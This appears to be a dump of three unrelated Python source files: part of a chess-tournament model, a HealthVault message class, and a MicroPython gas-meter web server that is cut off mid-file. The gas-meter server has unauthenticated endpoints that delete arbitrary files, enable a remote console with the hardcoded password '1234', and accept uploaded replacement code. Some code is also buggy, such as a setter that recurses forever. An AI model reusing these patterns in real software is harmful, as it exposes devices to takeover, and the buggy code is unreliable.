\"In progress\",\n \"FINISHED\": \"Finished\"\n }\n time_controls = [\n \"Bullet\",\n \"Blitz\",\n \"Rapid\"\n ]\n number_players = 8\n\n def __init__(self, id,\n name, location, date,\n time_control, description,\n number_turns=4\n ):\n self.id = id\n self.name = name\n self.location = location\n self.date = date\n self.players = []\n self.turns = []\n self.scores = []\n self._time_control = time_control\n self.description = description\n self.number_turns = number_turns\n self.pairs_already_played = []\n\n @property\n def time_control(self):\n return self._time_control\n\n @time_control.setter\n def time_control(self, value):\n if value in Tournament.time_controls:\n self.time_control = value\n\n def add_player(self, new_player):\n self.players.append(new_player)\n\n def has_pairs_already_played(self, two_players):\n if two_players in self.pairs_already_played or\\\n two_players[::-1] in self.pairs_already_played:\n return True\n return False\n\n def refresh_pairs_already_played(self):\n all_matchs = [match\n for turn in self.turns\n for match in turn.matchs]\n for match in all_matchs:\n pair = match.get_players()\n if pair not in self.pairs_already_played:\n self.pairs_already_played.append(pair)\n\n def generate_pairs(self):\n # Premier tour\n if len(self.turns) == 1:\n sorted_players = sorted(self.players, key=lambda j: j.rank, reverse=True)\n pairs = zip(\n sorted_players[:int(Tournament.number_players / 2)],\n sorted_players[int(Tournament.number_players / 2):]\n )\n pairs = list(pairs)\n else: # Tours suivants\n # On tri les players selon leur score/rank\n mixed_players = []\n for player in self.players:\n mixed_players.append((player, self.get_player_score(player), player.rank))\n\n sorted_players_score = sorted(mixed_players, key=lambda elm: (elm[1], elm[2]), reverse=True)\n sorted_players = [elm[0] for elm in sorted_players_score]\n\n # On aparie les joueurs dans l'ordre des scores/rank en décalant si le match a déjà eu lieu\n pairs = []\n while sorted_players:\n current_player = sorted_players.pop(0)\n for potential_player in sorted_players:\n potential_pair = [current_player, potential_player]\n if not self.has_pairs_already_played(potential_pair):\n pair = potential_pair\n sorted_players.remove(potential_player)\n break\n else:\n pair = [current_player, sorted_players[0]]\n sorted_players.pop(0)\n\n pairs.append(pair)\n\n self.pairs_already_played.extend(pairs)\n return pairs\n\n def begin_next_turn(self):\n new_turn = turn.Turn(f\"Round {len(self.turns) + 1}\")\n self.turns.append(new_turn)\n\n pairs = self.generate_pairs()\n new_turn.create_matches(pairs)\n\n def end_current_turn(self):\n self.update_scores()\n self.turns[-1].mark_as_complete()\n\n def get_current_turn(self):\n return self.get_turns()[-1] if self.get_turns() else None\n\n def update_scores(self):\n self.scores = []\n all_matchs = [match\n for turn in self.turns\n for match in turn.matchs]\n\n for player in self.players:\n player_score = 0\n for match in all_matchs:\n if player is match.get_first_player():\n player_score += match.get_score_first_player()\n elif player is match.get_second_player():\n player_score += match.get_score_second_player()\n self.scores.append({\n \"player_id\": player.id,\n \"player_score\": player_score,\n })\n\n def get_player_score(self, player):\n player_score = [score for score in self.scores if score[\"player_id\"] == player.id]\n return player_score[0][\"player_score\"] if player_score else 0\n\n def get_players_by_name(self):\n return sorted(self.players, key=lambda p: p.nom)\n\n def get_players_by_rank(self):\n return sorted(self.players, key=lambda p: p.rank)\n\n def get_turns(self):\n return self.turns\n\n def get_matchs(self):\n return [match\n for turn in self.turns\n for match in turn.matchs\n ]\n\n def state(self):\n if not self.turns:\n state = Tournament.states[\"NOT_STARTED\"]\n elif len(self.turns) == self.number_turns and\\\n self.turns[-1].is_finish():\n state = Tournament.states[\"FINISHED\"]\n else:\n state = Tournament.states[\"IN_PROGRESS\"]\n\n return state\n\n def set_id(self, new_id):\n try:\n self.id = int(new_id)\n except ValueError as error:\n raise ValueError(error)\n\n def serialize(self):\n serialized_tournament = {\n \"id\": self.id,\n \"name\": self.name,\n \"location\": self.location,\n \"date\": self.date,\n \"players\": [\n player.id for player in self.players\n ],\n \"turns\": [\n turn.serialize() for turn in self.turns\n ],\n \"time_control\": self.time_control,\n \"description\": self.description,\n \"number_turns\": self.number_turns,\n }\n\n return serialized_tournament\n\n @classmethod\n def deserialize(cls, serialized_tournament, players):\n tournament = Tournament(\n serialized_tournament[\"id\"],\n serialized_tournament[\"name\"],\n serialized_tournament[\"location\"],\n serialized_tournament[\"date\"],\n serialized_tournament[\"time_control\"],\n serialized_tournament[\"description\"],\n serialized_tournament[\"number_turns\"]\n )\n\n for player_id in serialized_tournament[\"players\"]:\n player = next(player for player in players if player.id == player_id)\n tournament.add_player(player)\n\n for serialized_turn in serialized_tournament[\"turns\"]:\n deserialized_turn = Turn.deserialize(serialized_turn, players)\n tournament.turns.append(deserialized_turn)\n\n tournament.update_scores()\n tournament.refresh_pairs_already_played()\n return tournament\n\n @classmethod\n def is_valid(cls, name, location, date,\n time_control, description):\n if not name or not location or not date:\n return False\n if time_control not in Tournament.time_controls:\n return False\n return True\n\n def __repr__(self):\n repr = f\"{self.name} - {self.location} - {self.date} - state : {self.state()} \\n\"\n repr += f\"players : {len(self.players)}/{Tournament.number_players}\\n\"\n sorted_players = sorted(self.players, key=lambda p: [self.get_player_score(p), p.rank], reverse=True)\n for player in sorted_players:\n repr += f\"\\t{player.lastname}\\t{player.firstname}\\t{player.rank}\\t{self.get_player_score(player)}\\n\"\n\n repr += \"\\n\"\n for tournament_turn in self.turns:\n repr += f\"{tournament_turn} \\n\"\n\n return repr\n","repo_name":"arnadu89/projet4","sub_path":"mvc_chess/models/tournament.py","file_name":"tournament.py","file_ext":"py","file_size_in_byte":7810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"3898046682","text":"from lxml import etree\n\nfrom healthvaultlib.utils.xmlutils import XmlUtils\nfrom healthvaultlib.itemtypes.healthrecorditem import HealthRecordItem\n\n\nclass Message(HealthRecordItem):\n\n def __init__(self, thing_xml=None):\n super(Message, self).__init__()\n self.type_id = '72dc49e1-1486-4634-b651-ef560ed051e5'\n if thing_xml is not None:\n self.thing_xml = thing_xml\n self.parse_thing()\n\n def __str__(self):\n return 'Message'\n\n def parse_thing(self):\n super(Message, self).parse_thing()\n xmlutils = XmlUtils(self.thing_xml)\n\n def write_xml(self):\n thing = super(Message, self).write_xml()\n data_xml = etree.Element('data-xml')\n message = etree.Element('message')\n\n data_xml.append(message)\n thing.append(data_xml)\n return thing\n","repo_name":"rajeevs1992/pyhealthvault","sub_path":"src/healthvaultlib/itemtypes/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"13597312456","text":"# -*- coding: ascii -*-\n\"\"\"\n# main.py\nThis is main code part.\n\nGas script\n\n\n# import time\n# no imports needed here, all taken from boot.py\n\"\"\"\n__version__ = 'v17_02'\n\nVGLOB = {}\n\n#-### TODO move this to boot\ninput1 = machine.ADC(machine.Pin(32))\ninput1.atten(machine.ADC.ATTN_11DB)\ninput1.width(machine.ADC.WIDTH_11BIT)\n#\ntimer_check = machine.Timer(0)\n\n#-### definition of functions\n\n#-###\n#-###\n#-### time zone definitions\n\n# from https://stackoverflow.com/questions/63271522/is-there-a-zfill-type-function-in-micro-python-zfill-in-micro-python\ndef zfl(s, width):\n# Pads the provided string with leading 0's to suit the specified 'chrs' length\n# Force # characters, fill with leading 0's\n return '{:0>{w}}'.format(s, w=width)\n\ndef localtime() -> str:\n # by JumpZero, https://forum.micropython.org/viewtopic.php?t=4034#p23122\n year = time.localtime()[0] # get current year\n HHMarch = time.mktime((year, 3, (31 - (int(5 * year / 4 + 4)) % 7), 1, 0, 0, 0, 0, 0)) # Time of March change to CEST\n HHOctober = time.mktime((year, 10, (31 - (int(5 * year / 4 + 1)) % 7), 1, 0, 0, 0, 0, 0)) # Time of October change to CET\n now = time.time()\n if now < HHMarch: # we are before last sunday of march\n cet = time.gmtime(now + 3600) # CET: UTC+1H\n elif now < HHOctober: # we are before last sunday of october\n cet = time.gmtime(now + 7200) # CEST: UTC+2H\n else: # we are after last sunday of october\n cet = time.gmtime(now + 3600) # CET: UTC+1H\n return(cet)\n\n#-###\n#-###\n#-### time function\n\ndef now(ttt: str = \"a\") -> str:\n if ttt == \"m\":\n return \"{0:04d}-{1:02d}-{2:02d}\".format(*localtime()) + \" {3:02d}:{4:02d}\".format(*localtime())\n if ttt == \"h\":\n return \"{0:04d}-{1:02d}-{2:02d}\".format(*localtime()) + \" {3:02d}\".format(*localtime())\n if ttt == \"d\":\n return \"{0:04d}-{1:02d}-{2:02d}\".format(*localtime())\n else:\n return \"{0:04d}-{1:02d}-{2:02d}\".format(*localtime()) + \" {3:02d}:{4:02d}:{5:02d}\".format(*localtime())\n\ndef frecalibrate() -> None:\n ### reset limits and extremes, recalibration of the sensor\n #VGLOB['limit'][0] = 0\n #VGLOB['limit'][1] = VGLOB['temp']\n #OFFSET['extremes'][0] = OFFSET['extremes'][1] = VGLOB['temp'] \n # reset temp limit and extremes\n value = fread_single()\n VGLOB['limit'][0] = 0 # temp limit up or down\n VGLOB['limit'][1] = round(value*0.99) # temp limit value\n OFFSET['extremes'][0] = round(value*0.99)\n OFFSET['extremes'][1] = round(value*1.01)\n return\n\ndef frecount() -> None:\n VGLOB['counter'] = OFFSET['value'] + ( sum(countsn_h) * OFFSET['res'] )\n return\n\ndef freset() -> None:\n # function to cleanly reset, while saving all the files\n try:\n fsave_count()\n except:\n pass\n #\n try:\n fsave_offset()\n except:\n pass\n #fsave_extremes\n time.sleep(0.05)\n machine.reset()\n\ndef fsave_count() -> None:\n time.sleep(0.05)\n print('=== saving')\n bb = open('countsn_h.bin', 'wb')\n bb.write(countsn_h)\n bb.close()\n time.sleep(0.05)\n return\n\ndef fsave_offset() -> None:\n # save offset file\n time.sleep(0.05)\n print('=== saving offset')\n dd = open('offset.py', 'w')\n dd.write( 'OFFSET = ' + str(OFFSET) )\n dd.close()\n time.sleep(0.05)\n return\n\n#-###\n#-###\n#-### callback, from the reed sensor\n\ndef fread_single(counts: int = 20) -> int:\n # this function reads single value\n # cleans the spikes, and cleans the output\n # it is a separa\n global VGLOB\n time_seconds = 0.5\n def single_read(countsin):\n time.sleep( round(time_seconds / countsin,3) )\n return( input1.read() )\n value_list = sorted([single_read(counts) for aaa in range(counts)])[round(counts*0.6):round(counts*0.8)]\n value_avg = sum( value_list ) / round(counts*0.2)\n value_stdev = sum( [abs(iii-value_avg) for iii in value_list] ) / round(counts*0.2)\n #print( value_stdev, value_list )\n #time.sleep(1)\n if value_stdev < 1: # was 1.5, but maybe more strict is better\n VGLOB['temp'] = round( value_avg, 1 )\n return round( VGLOB['temp'] ) \n\n\n#-###\ndef finput_read(var = None) -> None:\n # this function reads the cleaned input\n # sets extremes (calibration of readout) and triggers counting\n #\n global VGLOB\n global OFFSET\n #\n runavgires = fread_single()\n #print( runavgires )\n # \n # v17_01 the extremes where 10%, now changed to 1% difference\n OFFSET['extremes'][0] = min( OFFSET['extremes'][0], round(runavgires*1.01) )\n OFFSET['extremes'][1] = max( OFFSET['extremes'][1], round(runavgires*0.99) )\n diff = round( ( OFFSET['extremes'][1] - OFFSET['extremes'][0] ) * (2/3) )\n #\n # search max\n if VGLOB['limit'][0] == 1 and runavgires > VGLOB['limit'][1]:\n VGLOB['limit'][1] = runavgires\n # search min\n if VGLOB['limit'][0] == 0 and runavgires < VGLOB['limit'][1]:\n VGLOB['limit'][1] = runavgires\n # count drop\n if VGLOB['limit'][0] == 1 and runavgires < VGLOB['limit'][1] - diff:\n #print('count drop')\n VGLOB['limit'] = [ 0, runavgires ]\n #VGLOB['value'] = VGLOB['value'] + 0.05\n # trigger button\n fcb_btn()\n # count jump\n if VGLOB['limit'][0] == 0 and runavgires > VGLOB['limit'][1] + diff:\n #print('count jump')\n VGLOB['limit'] = [ 1, runavgires ]\n #VGLOB['value'] = VGLOB['value'] + 0.05\n # trigger button\n fcb_btn()\n #print('hall_ext', VGLOB['extremes'], runavgires, VGLOB['limit'])\n return\n\n#-###\n#-###\n#-###\n\ndef fcb_btn(var = None) -> None:\n #print('++ counter')\n #time.sleep(4)\n # get globals\n global countsn_h\n global countsn_d\n #global VGLOB['counter']\n #global inpvv\n global VGLOB\n #global vwebpage\n # define new objects in table\n diffh = int((time.time() - VGLOB['offset_time']) / (3600)) + 1\n while len(countsn_h) < diffh: # here was +1\n countsn_h.append(0)\n #\n diffd = int((time.time() - VGLOB['offset_time']) / (24 * 3600)) + 1\n while len(countsn_d) < diffd: # here was +1\n countsn_d.append(0)\n # if callback triggered\n #if True:\n # set update timer\n VGLOB['update'] = now()\n # last position is current\n # this is the place where things are counted\n countsn_h[-1] += 1\n countsn_d[-1] += 1\n #\n #recalculate\n frecount()\n #VGLOB['counter'] = OFFSET['value'] + ( sum(countsn_h) * OFFSET['res'] )\n #\n print('+++ counted !')\n #\n fsave_count()\n #\n gc.collect()\n return\n\n#-###\n#-###\n#-### send file\n\ndef fsendfile(writer, name) -> None:\n ###\n print('fsendfile')\n names = name.split(\".\")\n # print( names )\n if names[-1] == \"txt\":\n header = \"\"\"HTTP/1.1 200 OK\nCache-Control: max-age=600\nContent-Type: text/plain\n\"\"\"\n readtype = \"r\"\n elif names[-1] == \"gz\" and names[-2] == \"js\":\n header = \"\"\"HTTP/1.1 200 OK\nContent-Encoding: gzip\nExpires: Sat, 17 Aug 2030 17:17:17 GMT\nCache-Control: public\nContent-Type: text/javascript\n\"\"\"\n readtype = \"rb\"\n elif names[-1] == \"gz\" and names[-2] == \"css\":\n #Age: 100\n #Expires: Sat, 17 Aug 2030 17:17:17 GMT\n #Cache-Control: max-age=86400\n header = \"\"\"HTTP/1.1 200 OK\nContent-Encoding: gzip\nExpires: Sat, 17 Aug 2030 17:17:17 GMT\nCache-Control: public\nContent-Type: text/css\n\"\"\"\n readtype = \"rb\"\n #\n aa = open(name, readtype)\n webpagelen = aa.seek(0, 2)\n aa.seek(0)\n header += \"\"\"Content-Length: \"\"\" + str(webpagelen) + \"\"\"\nConnection: close\n\"\"\"\n await writer.awrite(header + \"\\r\\n\")\n #\n #\n while aa.tell() < webpagelen:\n await writer.awrite( aa.read(12000) )\n #conn.send(aa.read(12000))\n #\n aa.close()\n # del aa\n print('fsendfile done')\n gc.collect()\n return\n\n#-###\n#-###\n#-### send data from memory\n\ndef fsenddata(writer, name, delta: int) -> None:\n # no close in header, as unknown lenght\n header = \"\"\"HTTP/1.1 200 OK\nContent-Type: text/plain\nTransfer-Encoding: chunked\nConnection: close\n\"\"\"\n # Connection: close\n #conn.send(header + \"\\r\\n\")\n await writer.awrite(header + \"\\r\\n\")\n # select so, that one complete chunk is not more than 10k\n chunklen = 200\n iii = 0\n # name = str( name )\n while iii < len(name):\n chunk = []\n chunksend = ''\n if iii + chunklen < len(name):\n chunk = name[iii:iii + chunklen]\n else:\n chunk = name[iii:len(name)]\n # create data\n for jjj in range(len(chunk)):\n # offset_time\n chunksend += str( iii + jjj ) + \" - \" + str( int( chunk[jjj] ) ) + \"\\r\\n\"\n #chunksend += str(iii + jjj) + \"; \" + str(OFFSET['date'] + ((iii + jjj) * delta)) + \"; \" + str(time.gmtime(OFFSET['date'] + ((iii + jjj) * delta))[0:4]) + \"; \" + str(int(chunk[jjj])) + \"; \" + str(int(chunk[jjj]) * OFFSET['res']) + \"\\r\\n\"\n #chunksend += str(iii + jjj) + \"; \" + str(OFFSET['date'] + ((iii + jjj) * delta)) + \"; \" + str(time.gmtime(OFFSET['date'] + ((iii + jjj) * delta))[0:4]) + \"; \" + str(int(chunk[jjj])) + \"; \" + str(int(chunk[jjj]) * OFFSET['res']) + \"\\r\\n\"\n # send data\n # if len( chunksend ) > 0:\n #conn.send(str(hex(len(chunksend))[2:]) + \"\\r\\n\" + chunksend + \"\\r\\n\")\n await writer.awrite( str(hex(len(chunksend))[2:]) + \"\\r\\n\" + chunksend + \"\\r\\n\" )\n #\n # print( iii, chunk )\n iii += chunklen\n # close\n await writer.awrite( \"0\\r\\n\\r\\n\" )\n #conn.send(\"0\\r\\n\\r\\n\")\n # do not conn.close here, and no return\n gc.collect()\n return\n\n#-###\n#-###\n#-### webpage generating function\n\npage_meta = \"\"\"\n\n\"\"\"\n\ndef fwebpage() -> str:\n global countsn_h\n global countsn_d\n # define new objects in table\n now = time.time()\n diffh = int((now - VGLOB['offset_time']) / (3600)) + 1\n while len(countsn_h) < diffh: # here was +1\n countsn_h.append(0)\n #\n diffd = int((now - VGLOB['offset_time']) / (24 * 3600)) + 1\n while len(countsn_d) < diffd: # here was +1\n countsn_d.append(0)\n # create chart, from last 48h\n #countsn_ha = list(reversed(list(countsn_h)[-48:])) # first cut, than convert to list\n countsn_ha = list(reversed(list(countsn_h[-48:])))\n # countsn_ha.reverse() # reverse short table for speed\n # chart\n # v17_02 hourly graph description\n # hour from last change VGLOB['update'], localtime()[3]\n chart_inx = str( [ ( ( ooo + localtime()[3] ) %24 ) for ooo in range( len( countsn_ha ),0,-1 ) ] )\n #chart_inx = str(list(range(1, len(countsn_ha) + 1)))\n chart_iny = str( [ x * OFFSET['res'] for x in countsn_ha ] )\n #\n html_in = \"\"\n # generate table\n # countsn_d.reverse()\n # for iii in list( reversed( range( len( countsn_d ) ) ) ): # reversed\n # show last 15 days, and not everything\n for iii in list(reversed(range(len(countsn_d) - 15, len(countsn_d)))): # reversed\n if iii < 0:\n continue\n # iiiv = round( countsn_d[iii] * vresolution, 2 )\n html_in = html_in + \"\" + \"-\".join(map(lambda aaa: '{:0>{w}}'.format(str(aaa), w=2), time.gmtime(VGLOB['offset_time'] + (iii * 3600 * 24))[0:3])) + \"\" + \"{:.2f}\".format(\n countsn_d[iii] * OFFSET['res']) + \"\" + \"{:.1f}\".format(countsn_d[iii] * OFFSET['res'] * OFFSET['energy']) + \"\\n\"\n #\n # generate rest of html\n html = \"\"\"\n\n\nGas meter\n\"\"\" + page_meta + \"\"\"\n\n\n\n

Gas meter

\n

System

\nVersion: \"\"\" + str(__version__) + \"\"\"
\nTotal count: \"\"\" + str((int((VGLOB['counter']) * 10)) / 10) + \"\"\" (\"\"\" + str(VGLOB['counter']) + \"\"\")
\nLast change: \"\"\" + str(VGLOB['update']) + \"\"\"
\nBoot: \"\"\" + str(VGLOB['boot']) + \"\"\"
\n

Links:

\nCounts hourly
\nCounts daily
\nInfo
\nSetting
\nUpdate OTA
\nAdd webrepl - Webrepl console (pass: 1234)
\nReset\n

Daily

\n\n\n\"\"\" + html_in + \"\"\"\n
Date ---------------Value (m^3) ----Value (kWh) ----
\n

Graph (hourly consumption)

\n
\n\n\n\"\"\"\n #\n html = html.encode('ascii')\n #print('= f generating page')\n #\n return( html )\n\n\n#-####\n#-####\n# -#### webpage loop function\n# -#### was based on socket, but now on async is more responsive and less consuming\n\nasync def loop_web(reader, writer) -> None:\n # waiting for input\n #recv = await reader.read(64)\n await asyncio.sleep(0.1)\n recv = yield from reader.read(64)\n #gc.collect()\n flood = 0\n #\n if gc.mem_free() < 10000:\n print('+ page flood 1')\n #GET / HTTP/1.1\n flood = 1\n #print(\"- f serving page\")\n #timer1 = time.ticks_ms()\n # 'GET / HTTP/1.\n #global ERRORLOG\n try:\n #recvtmp = recv.decode()\n if flood == 0:\n requesttype = recv.decode()[0:3]\n requestfull = recv.decode().split('\\r')[0].split(' ')[1].split('?')\n #requestfull = requestfull # [4:-6]\n #recv2 = await reader.read()\n #print( recv2.decode() )\n else:\n requestfull = ['/flood']\n except Exception as e:\n # if request invalid or malformed\n print('+ page request warn ', e)\n #ferror_log(\"f serving bad page - \" + str(requestfull) )\n requestfull = ['/']\n # continue\n # ?\n global VGLOB\n global VSCAN_LIST\n global countsn_d\n request = requestfull[0]\n #print(request, requestfull)\n requestval = ''\n vwebpage = b''\n resp = b''\n #timer2 = time.ticks_ms()\n #gc.collect()\n #print('= f serving page ', requestfull, \"||\", requestval, \"||\", request)\n #\n if len(requestfull) == 2:\n requestval = requestfull[1]\n #\n if request == \"/\":\n vwebpage = fwebpage()\n # Server-Timing: text;dur=\"\"\" + str(time.ticks_ms() - timer2) + \"\"\", req;dur=\"\"\" + str(timer2 - timer1) + \"\"\"\n header = \"\"\"HTTP/1.1 200 OK\nContent-Type: text/html\nContent-Length: \"\"\" + str(len(vwebpage)) + \"\"\"\nConnection: close\n\"\"\"\n #conn.sendall(header + \"\\r\\n\" + vwebpage)\n await writer.awrite(header + \"\\r\\n\")\n # gc.collect()\n # INFO\n # await writer.awrite(vwebpage)\n #vwebpage = b''\n # continue\n #####\n #####\n elif request.split(\".\")[-1] == \"txt\" or request.split(\".\")[-1] == \"gz\":\n #\n await fsendfile(writer, request)\n #rrr = yield from fsendfile(writer, request)\n #\n #print('starting function fsendfile 2')\n ###\n elif request == \"/countsn_h\":\n await fsenddata(writer, countsn_h, 3600)\n #print('starting function fsenddata h 2')\n ###\n elif request == \"/countsn_d\":\n await fsenddata(writer, countsn_d, 3600 * 24)\n #print('starting function fsenddata d 2')\n ###\n elif request == \"/flood\":\n header = \"\"\"HTTP/1.1 200 OK\nContent-Type: text/html\nContent-Length: 12\nConnection: close\n\"\"\"\n await writer.awrite(header + \"\\r\\n\" + \"flood, retry\" + \"\\r\\n\")\n # gc.collect()\n elif request == \"/deldo\":\n header = \"\"\"HTTP/1.1 302 Found\nContent-Length: 0\nLocation: /info\nConnection: close\n\"\"\"\n # Connection: close\n if requestval != '':\n try:\n os.remove(requestval)\n except Exception as e:\n # try to remove file, if fail no panic\n print('--- deldo file does not exist ', e)\n #pass\n # conn.sendall(header)\n await writer.awrite(header + \"\\r\\n\")\n # await writer.awrite(vwebpage)\n #####\n #####\n elif request == \"/setting\":\n #\n vwebpage = \"\"\"\"\"\" + page_meta + \"\"\"\nBACK
\n
\nCorrect counts by 1 count (= \"\"\" + str(OFFSET['res']) + \"\"\") (count now \"\"\" + str(VGLOB['counter']) + \"\"\"):
\n
\n     \n
\n\nSetting:
\n
\nCounting start date, for which the counter will be set:
\n
\nStarting value (always should end with 0.03):
\n
\nEnergy (in kWh per m^3 of gas):
\n
\nCounter resolution:
\n
\n\n
\n.\n\"\"\"\n # add zfill\n vwebpage = vwebpage.encode('ascii')\n #\n header = \"\"\"HTTP/1.1 200 OK\nContent-Type: text/html\nContent-Length: \"\"\" + str(len(vwebpage)) + \"\"\"\nConnection: close\n\"\"\"\n #conn.sendall(header + \"\\r\\n\" + vwebpage)\n await writer.awrite(header + \"\\r\\n\")\n #\n elif request == \"/settingdo\":\n # ###\n #global countsn_h\n #print( recv.decode() )\n headerin = yield from reader.read(5000)\n # print(headerin)\n headerin = headerin.decode().split('\\r\\n\\r\\n')[-1].strip()\n headerin = str( \";\".join( headerin.strip().split('\\r\\n') ) )\n vwebpage = headerin.encode('ascii')\n #\n header = \"\"\"HTTP/1.1 200 OK\nContent-Type: text/plain\nContent-Length: \"\"\" + str(len(vwebpage)) + \"\"\"\nConnection: close\n\"\"\"\n #conn.sendall(header + \"\\r\\n\" + vwebpage)\n #await writer.awrite(header + \"\\r\\n\")\n #\n if headerin == \"add_one=add_one\":\n #print('adding')\n #fcb_btn()\n countsn_h[-1] += 1\n if headerin == \"remove_one=remove_one\":\n #print('removing')\n #fcb_btn()\n countsn_h[ [ nnn for nnn in range(-len(countsn_h), 0) if countsn_h[nnn] > 0 ][-1] ] -= 1\n if headerin[0:6] == \"OFFSET\":\n ### TODO\n for lll in headerin.split(\";\"):\n #print( lll )\n if lll[0:16] == 'OFFSET[\"value\"]=':\n try:\n OFFSET[\"value\"] = float( lll.split('=')[1] )\n frecount()\n except:\n pass\n print('setting values')\n ###\n if headerin == \"recalibrate\":\n ### TODO\n print('recalibrating')\n ### \n # recalculate values daily\n countsn_d = []\n for kkk in range(len(countsn_h)):\n if (kkk) >= (len(countsn_d) * 24):\n countsn_d.append(0)\n countsn_d[-1] += countsn_h[kkk]\n # recalculate counter\n frecount()\n #VGLOB['counter'] = OFFSET['value'] + (sum(countsn_h) * OFFSET['res'])\n #\n header = \"\"\"HTTP/1.1 302 Found\nContent-Length: 0\nLocation: /setting\nConnection: close\n\n\"\"\"\n await writer.awrite(header + \"\\r\\n\")\n # ###\n elif request == \"/info\":\n #\n if machine.reset_cause() == 0:\n reset_cause = \"PWRON_RESET\"\n elif machine.reset_cause() == 1:\n reset_cause = \"HARD_RESET\"\n elif machine.reset_cause() == 2:\n reset_cause = \"WDT_RESET\"\n elif machine.reset_cause() == 3:\n reset_cause = \"DEEPSLEEP_RESET\"\n elif machine.reset_cause() == 4:\n reset_cause = \"SOFT_RESET\"\n elif machine.reset_cause() == 5:\n reset_cause = \"BROWN_OUT_RESET\"\n else:\n reset_cause = \"unknown\"\n #\n # MQTT addresses IN:\\n\"\"\" + \"\\n\".join( [ str(aaa) for aaa in VMQTT_SUB_LIST ] ) + \"\"\"\n vwebpage = \"\"\"\"\"\" + page_meta + \"\"\"\nDirectory listing on ESP. By writing /deldo?filename, files can be removed (dangerous).
\nFiles with _old are safety copies after OTA, can be safely removed.
\nTo disable webrepl, delete webrepl_cfg.py and reboot device.
\n
\nDir: \"\"\" + str(os.listdir()) + \"\"\"
\n
\nGlobal variables and settings:
\n\"\"\" + str(VGLOB) + \"\"\"
\n\"\"\" + str(OFFSET) + \"\"\"
\n
\nError log:\\n\"\"\" + \"\\n\".join( [ str(aaa) for aaa in ERRORLOG ] ) + \"\"\"
\n
\nReset cause: \"\"\" + str(reset_cause) + \"\"\"
\nMicropython version: \"\"\" + str(os.uname()) + \"\"\"
\nFree RAM: \"\"\" + str(gc.mem_free()) + \"\"\"
\n.\n\"\"\"\n #\n #vwebpage = vwebpage.encode('latin-1')\n vwebpage = vwebpage.encode('ascii')\n #\n header = \"\"\"HTTP/1.1 200 OK\nContent-Type: text/html\nContent-Length: \"\"\" + str(len(vwebpage)) + \"\"\"\nConnection: close\n\"\"\"\n #conn.sendall(header + \"\\r\\n\" + vwebpage)\n await writer.awrite(header + \"\\r\\n\")\n # INFO\n # await writer.awrite(vwebpage)\n # conn.close()\n #####\n #####\n elif request == \"/webrepl\":\n #requestval = requestfull.split('\\r')[0].split(' ')[1].split('?')[1]\n #vwebpage = str(requestval) + \"\\n\" + str(os.listdir())\n try:\n fff = open('webrepl_cfg.py', 'w')\n await fff.write(\"PASS = \\'1234\\'\\n\")\n fff.close()\n except Exception as e:\n print('--- webrepl init issue ', e)\n # try to open file, if fail no panic\n #pass\n header = \"\"\"HTTP/1.1 302 Found\nContent-Length: 0\nLocation: /reset\nConnection: close\n\"\"\"\n #conn.sendall(header + \"\\r\\n\" + vwebpage)\n await writer.awrite(header + \"\\r\\n\")\n # await writer.awrite(vwebpage)\n # machine.reset()\n #####\n #####\n elif request == \"/ota\":\n # postpone job, to speed up ota\n #fpostpone()\n #ble.gap_scan( 0 )\n # method=\"post\"\n vwebpage = \"\"\"\"\"\" + page_meta + \"\"\"\nUsually upload main.py file. Sometimes boot.py file. Binary files do not work yet.\n
\n
\n\n\n
\n.\n\"\"\"\n header = \"\"\"HTTP/1.1 200 OK\nContent-Type: text/html\nContent-Length: \"\"\" + str(len(vwebpage)) + \"\"\"\nConnection: close\n\"\"\"\n #conn.sendall(header + \"\\r\\n\" + vwebpage)\n await writer.awrite(header + \"\\r\\n\")\n # INFO\n # await writer.awrite(vwebpage)\n #####\n #####\n elif request == \"/otado\":\n # postpone job, to speed up ota\n #fpostpone()\n # stop scan if any\n #fstopscan()\n #\n vwebpage = ''\n #VGLOB = ''\n VSCAN_LIST = {}\n #gc.collect()\n # s.setblocking(0)\n header = \"\"\"HTTP/1.1 302 Found\nContent-Length: 0\nLocation: /reset\nConnection: close\n\n\"\"\"\n # =\n #ble.active(False)\n #gc.collect()\n #headerin = conn.recv(500).decode()\n headerin = yield from reader.read(500)\n # print(headerin)\n headerin = headerin.decode()\n boundaryin = headerin.split(\"boundary=\", 2)[1].split('\\r\\n')[0]\n lenin = int(headerin.split(\"\\r\\nContent-Length: \", 2)[1].split('\\r\\n')[0])\n # dividing into 2000 bytes pieces\n bufflen = round(lenin / float(str(round(lenin / 2000)) + \".5\"))\n #lenin = 0\n # print(\"===\")\n #print( headerin )\n #print( \"===\" )\n begin = 0\n try:\n os.remove('upload')\n except Exception as e:\n # try to upload file, if fail no panic\n print('+ otado cleaning fail 1, this is fine', e)\n #pass\n fff = open('upload', 'wb')\n while True:\n #dataaa = conn.recv(bufflen).decode().split('\\r\\n--' + boundaryin, 2)\n dataaa = yield from reader.read(bufflen)\n dataaa = dataaa.decode().split('\\r\\n--' + boundaryin, 2)\n splita = len(dataaa)\n #print( splita )\n #filein += dataaa\n if begin == 0 and splita == 3:\n #print( \"= short\" )\n # short\n # conn.sendall(header)\n # conn.close()\n await writer.awrite(header + \"\\r\\n\")\n namein = dataaa[1].split(' filename=\"', 1)[1].split('\"\\r\\n', 1)[0]\n fff.write(dataaa[1].split('\\r\\n\\r\\n', 1)[1])\n # done with success\n begin = 3\n break\n if begin == 0 and splita == 2:\n #print( \"= first\" )\n # first\n namein = dataaa[1].split(' filename=\"', 1)[1].split('\"\\r\\n', 1)[0]\n fff.write(dataaa[1].split('\\r\\n\\r\\n', 1)[1])\n begin = 1\n elif begin == 1 and splita == 1:\n #print( \"= middle\" )\n # middle\n fff.write(dataaa[0])\n elif begin == 1 and splita == 2:\n #print( \"= last\" )\n # last\n # conn.sendall(header)\n await writer.awrite(header + \"\\r\\n\")\n # conn.close()\n fff.write(dataaa[0])\n # done with success\n begin = 3\n break\n fff.close()\n # now replace new file\n if begin == 3:\n try:\n os.remove(namein + \"_old\")\n except Exception as e:\n print('+ otado cleaning fail 2, this is fine', e)\n #pass\n try:\n os.rename(namein, namein + \"_old\")\n except Exception as e:\n print('+ otado cleaning fail 3, this is fine', e)\n os.rename('upload', namein)\n #print( \"===\" )\n #print( namein )\n #print( lenin )\n dataaa = ''\n #ble.active(True)\n #gc.collect()\n #####\n #####\n elif request == \"/reset\":\n #fpostpone()\n header = \"\"\"HTTP/1.1 200 